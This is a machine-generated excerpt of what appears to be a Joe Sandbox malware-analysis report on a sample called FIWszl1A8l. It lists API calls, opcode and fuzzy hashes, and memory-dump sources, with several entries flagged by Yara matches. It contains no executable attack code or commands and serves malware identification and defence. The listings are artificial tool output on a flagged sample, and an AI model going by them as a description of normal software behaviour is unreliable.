                                                                                                  • Instruction Fuzzy Hash: A82160717003069B8B18DF68E8D4E5D73AAFF883147104569E516CB7A1E770ED54CBA4
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 00933A3A
                                                                                                    • Part of subcall function 00933995: ___BuildCatchObjectHelper.LIBCMT ref: 009339CB
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00933A51
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction ID: 89c3320d0474645247c3c67212eae3c11149a552edfa3944202bf333f7b9d033
                                                                                                  • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                  • Instruction Fuzzy Hash: C601F23104010ABBDF12AF51CD4AFAB7F6AEF48354F108010BD5865661E776DAB1EFA1
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 0284032D
                                                                                                    • Part of subcall function 02840288: ___BuildCatchObjectHelper.LIBCMT ref: 028402BE
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 02840344
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: a09745e068ffd7918f554851a4fca93550bee942cce2d07acd7e995c9d4619f6
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: 5F01243D40010ABBCF166E55CC84EEB3F6AEF18348F044010FE1C98520DB3698A1EBE1
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 03FC4C29
                                                                                                    • Part of subcall function 03FC4B84: ___BuildCatchObjectHelper.LIBCMT ref: 03FC4BBA
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 03FC4C40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3487967840-3733052814
                                                                                                  • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction ID: 4563dbfb44f9b017e7b824652b24ed7b6ae5f01f9e6945be19f0f40124ccf789
                                                                                                  • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                  • Instruction Fuzzy Hash: F601283549028BBBCF13EE52CE54EEA7F6AEF08354F044018BD1819170D736D961DBA0
                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0D868
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0D938
                                                                                                  • SetLastError.KERNEL32(0000007F), ref: 02D0D963
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Read$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2715074504-0
                                                                                                  • Opcode ID: 3f371618415ec81d9a7a096c573b2324305ec41d599c40bfb71e54070a43573a
                                                                                                  • Instruction ID: e16aff95efb90e5ca38782ec3b1471843890c35b9aeb0391fa6249a72720ba41
                                                                                                  • Opcode Fuzzy Hash: 3f371618415ec81d9a7a096c573b2324305ec41d599c40bfb71e54070a43573a
                                                                                                  • Instruction Fuzzy Hash: 95418A71A00205ABDB20CF99E884B6AF7FAFF88714F14855AE84997395D770E911CB90
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                  • Instruction ID: 148008fcd7b6620a87ae7e1d45908d9404350381dc7647cd5a68707f2ca83662
                                                                                                  • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                  • Instruction Fuzzy Hash: 8E314D31850E35EEFB21AF74AD887453EEAEB49361B188516E415D7274FB31C481CF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction ID: a3a8a6f61cb7402f9a47f69905400b52db23c05ea11359f7ea48bf7c7faa2e3a
                                                                                                  • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction Fuzzy Hash: CB316D39902A20EFFB13EB758C98A567FA5EB44B64B10455AF914C62B1E7348055EFC0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3556499859-0
                                                                                                  • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction ID: 0213ca6b7908a657e56a4a7e1db7d397d8197dbfa8c45dd6bac67ad5541eaef7
                                                                                                  • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                  • Instruction Fuzzy Hash: 23316F71D01761EFFB52EB769C98A967FB8EB847A0B18412AF914CB1B1EB308045DF50
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D1A5F6
                                                                                                  • __isleadbyte_l.LIBCMT ref: 02D1A629
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02D1A65A
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02D1A6C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 7e9d43dcdc434b73c7ac5d0c73062264c7bace4a1a8d70f182b185d4895e157c
                                                                                                  • Instruction ID: f2c8333fe6980e633d0a6ca0bf1151003e328b71834bfe8c595b45d9fbe2b916
                                                                                                  • Opcode Fuzzy Hash: 7e9d43dcdc434b73c7ac5d0c73062264c7bace4a1a8d70f182b185d4895e157c
                                                                                                  • Instruction Fuzzy Hash: E031F031A06286FFDB21DFA4E880ABE7BA5FF01314F1985A9E4618B790E730DD40CB50
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0097E459
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0097E48C
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0097E4BD
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0097E52B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: c2c9c12bca1ee3cdcb1e296a90d2ea9fe7297d5409b954cf9ef21d25f34e9ef3
                                                                                                  • Instruction ID: b16ac348f07811ad121c13bb6f65cb6ecc8055f1e179f63df057810af8232ce9
                                                                                                  • Opcode Fuzzy Hash: c2c9c12bca1ee3cdcb1e296a90d2ea9fe7297d5409b954cf9ef21d25f34e9ef3
                                                                                                  • Instruction Fuzzy Hash: C031C332A04255EFDF10DF64C884AB93BA9AF09310F19C5E9F4698B1B1D730DD50DB51
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2425037729-0
                                                                                                  • Opcode ID: 41152bbc626d90be37df571ac941429cfeddbeb2b9d81119a76fbb94fe229bcd
                                                                                                  • Instruction ID: 34f27b5cb2f9fe16a845007b86ac8a2bfe84c17bb1e3fd617d31ed1a78318835
                                                                                                  • Opcode Fuzzy Hash: 41152bbc626d90be37df571ac941429cfeddbeb2b9d81119a76fbb94fe229bcd
                                                                                                  • Instruction Fuzzy Hash: A221D672B001199BCB248E68DCC0FBE73AAEBC4720B35426DED09C7761EB719D51D6A0
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 02D043EC
                                                                                                    • Part of subcall function 02D013A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02D013CB
                                                                                                    • Part of subcall function 02D041E0: EnterCriticalSection.KERNEL32(02D04FB5,02D04E55,02D042BE,00000000,?,?,02D04E55,?,?,?,?,00000000,000000FF), ref: 02D041E8
                                                                                                    • Part of subcall function 02D041E0: LeaveCriticalSection.KERNEL32(02D04FB5,?,?,?,00000000,000000FF), ref: 02D041F6
                                                                                                    • Part of subcall function 02D04C70: HeapFree.KERNEL32(?,00000000,?,00000000,02D04E55,?,02D042C8,02D04E55,00000000,?,?,02D04E55,?), ref: 02D04C97
                                                                                                  • SetLastError.KERNEL32(00000000,?), ref: 02D043D7
                                                                                                  • SetLastError.KERNEL32(00000057), ref: 02D04401
                                                                                                  • WSAGetLastError.WS2_32(?), ref: 02D04410
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2060118545-0
                                                                                                  • Opcode ID: 9538584b7105293616b9b507bed9eb8a66188b0dabba250bf0aa71eb9a0440f0
                                                                                                  • Instruction ID: 9d95e6bd5ef49dc2b2c29a4af9612c1812cec4bb607cc801ec7aec08523a133a
                                                                                                  • Opcode Fuzzy Hash: 9538584b7105293616b9b507bed9eb8a66188b0dabba250bf0aa71eb9a0440f0
                                                                                                  • Instruction Fuzzy Hash: C811A736A0551897CB10EE69F884A9EB7A8EF94322B0545AAFD0CD3350D7319E1586E0
                                                                                                  APIs
                                                                                                  • SetLastError.KERNEL32(0000139F), ref: 009743EC
                                                                                                    • Part of subcall function 009713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 009713CB
                                                                                                    • Part of subcall function 00974C50: HeapFree.KERNEL32(?,00000000,?,00000000,00974E35,?,009742C8,00974E35,00000000,?,?,00974E35,?), ref: 00974C77
                                                                                                  • SetLastError.KERNEL32(00000000,?), ref: 009743D7
                                                                                                  • SetLastError.KERNEL32(00000057), ref: 00974401
                                                                                                  • WSAGetLastError.WS2_32(?), ref: 00974410
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$Heap$AllocFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 1906775185-0
                                                                                                  • Opcode ID: 36de4e8aaec973190ba719ca9ab10cedbdc55f04f608bf908fb1065d2def063c
                                                                                                  • Instruction ID: 40a53f5c8b93f3b64259e240424253a2418c53e01632e75f4f586d7e65e695bf
                                                                                                  • Opcode Fuzzy Hash: 36de4e8aaec973190ba719ca9ab10cedbdc55f04f608bf908fb1065d2def063c
                                                                                                  • Instruction Fuzzy Hash: E4117337A095289BC710EF69F8846EEB7A8EB84722B1581AAED0DE7201D7359D0547D0
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 02D0DE93
                                                                                                  • _free.LIBCMT ref: 02D0DED5
                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,02D0DC95), ref: 02D0DEFC
                                                                                                  • HeapFree.KERNEL32(00000000), ref: 02D0DF03
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Heap_free$FreeProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1072109031-0
                                                                                                  • Opcode ID: 1deea51bc5a964a9af7f0ad22e5f601f3f68c9d02650c6492e16add7c8cfc0c4
                                                                                                  • Instruction ID: e2968381a9ad4d6f4f41f9273cad5cc86cb4dd6a5497f4a89f53cb165c9464fc
                                                                                                  • Opcode Fuzzy Hash: 1deea51bc5a964a9af7f0ad22e5f601f3f68c9d02650c6492e16add7c8cfc0c4
                                                                                                  • Instruction Fuzzy Hash: F0114C71A007009BD730DAA5CD89B1773A6FB84710F14891DE59A47BA0DB74F842CF61
                                                                                                  APIs
                                                                                                  • WSAEventSelect.WS2_32(?,02D03ABB,00000023), ref: 02D03C02
                                                                                                  • WSAGetLastError.WS2_32 ref: 02D03C0D
                                                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 02D03C58
                                                                                                  • WSAGetLastError.WS2_32 ref: 02D03C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EventSelectsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 259408233-0
                                                                                                  • Opcode ID: d0fe6cf4d00b91c3e7f95f062ef6040247e1c2a7afd91781e24cd8f4069c2db3
                                                                                                  • Instruction ID: 404c1889805d8fe7535543bd134f0f32cba64ae649a1ba2684700cc27415873a
                                                                                                  • Opcode Fuzzy Hash: d0fe6cf4d00b91c3e7f95f062ef6040247e1c2a7afd91781e24cd8f4069c2db3
                                                                                                  • Instruction Fuzzy Hash: 4E1128B66007009BD7609B7999C8B5BB6E9FB88710F110A2DFA96C3790D771E840CB60
                                                                                                  APIs
                                                                                                  • WSAEventSelect.WS2_32(?,00973ABB,00000023), ref: 00973C02
                                                                                                  • WSAGetLastError.WS2_32 ref: 00973C0D
                                                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00973C58
                                                                                                  • WSAGetLastError.WS2_32 ref: 00973C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$EventSelectsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 259408233-0
                                                                                                  • Opcode ID: b5be22bc945a58eb7c014d10f7b7578390ff744bc46c9c96986dff0e30445993
                                                                                                  • Instruction ID: c7172049a5bfb4869a6938ac18c90c1bd6aa4b00fe89e5fda705cab7c2ce3613
                                                                                                  • Opcode Fuzzy Hash: b5be22bc945a58eb7c014d10f7b7578390ff744bc46c9c96986dff0e30445993
                                                                                                  • Instruction Fuzzy Hash: 461191B2614B005BD3208F79D8C8A47B6E9FBC8710F418A2DFA9BC3651D731E8009B50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 3f22943d5c49dd691436c8756b4f19095c9a66a4764f052f0d8222cc7fbfb8dd
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: FF117B3200415AFBCF169E84EC61CEE3F36BF58390B588824FE1858039C637C9B1AB81
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: e24c18aa744efc2439b9cb85dab561bb709aa61fb9157f0e07de783145a8ee3a
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: D41139BA40014EBBCF135E89CC51CEE3F62BB18398B488815FA5899030D736C5B1AB82
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 04c8fec23ea3e89da28c1854501ffeb53aca522af1438d83e0d5f9c714df9bcd
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: E2114B3204014EBBCF125E94EC11CEE7F63BB18358F588456FA5859A30C736C9B2EB91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: e4a0e531264a6b1c7510d7c703b42dd690d011d4befbc83d8fd0c11595b9c287
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: 1A114B3700414AFBCF126E84CC618EE3F26BB58394B598425FA6C69031D236C9B1AB81
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction ID: 3f11a2b474b621213b7bff2885527c64aa2e11b94586249f5ff6f08918604ae0
                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                  • Instruction Fuzzy Hash: BB118C7649028FFBCF269E84CD01CEE7F36FB08250B498518FA1858031DB36C5B2AB81
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0092D9A1
                                                                                                    • Part of subcall function 009298E6: __getptd_noexit.LIBCMT ref: 009298E9
                                                                                                    • Part of subcall function 009298E6: __amsg_exit.LIBCMT ref: 009298F6
                                                                                                  • __amsg_exit.LIBCMT ref: 0092D9C1
                                                                                                  • __lock.LIBCMT ref: 0092D9D1
                                                                                                  • _free.LIBCMT ref: 0092DA01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3782668054.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Offset: 00920000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_920000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
                                                                                                  • Opcode ID: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                  • Instruction ID: 3eb6774482def40d1c144d648ded23d70a99fb15bad328f69aab31886d155eee
                                                                                                  • Opcode Fuzzy Hash: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                  • Instruction Fuzzy Hash: 9E01D23690B6319BDB11EF64B886B6DB774BF44710F054004F8006B2D9CB34AD81DBD2
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02834250
                                                                                                    • Part of subcall function 0283381A: __getptd_noexit.LIBCMT ref: 0283381D
                                                                                                    • Part of subcall function 0283381A: __amsg_exit.LIBCMT ref: 0283382A
                                                                                                  • __amsg_exit.LIBCMT ref: 02834270
                                                                                                  • __lock.LIBCMT ref: 02834280
                                                                                                  • _free.LIBCMT ref: 028342B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170801528-0
